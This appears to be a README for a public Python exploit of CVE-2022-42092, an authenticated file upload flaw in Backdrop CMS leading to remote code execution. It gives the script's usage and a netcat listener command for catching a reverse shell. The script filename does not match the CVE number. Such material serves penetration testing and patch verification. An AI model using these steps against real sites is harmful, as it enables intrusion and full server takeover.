## https://sploitus.com/exploit?id=41F3A9C4-DD4E-5BFC-BD81-EB8F44845275
# CVE-2022-42092 Python Exploit

## 🔥 Description
This Python exploit script targets an unrestricted file upload vulnerability in Backdrop CMS to achieve Remote Code Execution (RCE).

## ⚠️ Affected Versions
Version 1.22.0 and prior versions.

Note: Backdrop CMS disputes this and argues that advanced permissions are required, which is why it might still exist in versions above 1.22.0. I’m guessing they mean you would need to have admin access first. Still, it’s a valid vulnerability, and it can definitely be exploited to gain full system control.

## ⚙️ Usage
```shell
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
```
Important: Start your listener before running the script:
```shell
nc -lvnp <listener_port>
```

## 💻 Sample Run
![image](https://github.com/user-attachments/assets/62f02ffc-3de5-4b72-b274-9575e3b4780f)

## ℹ️ Reference
- [CVE-2022-42092 Detail](https://nvd.nist.gov/vuln/detail/CVE-2022-42092)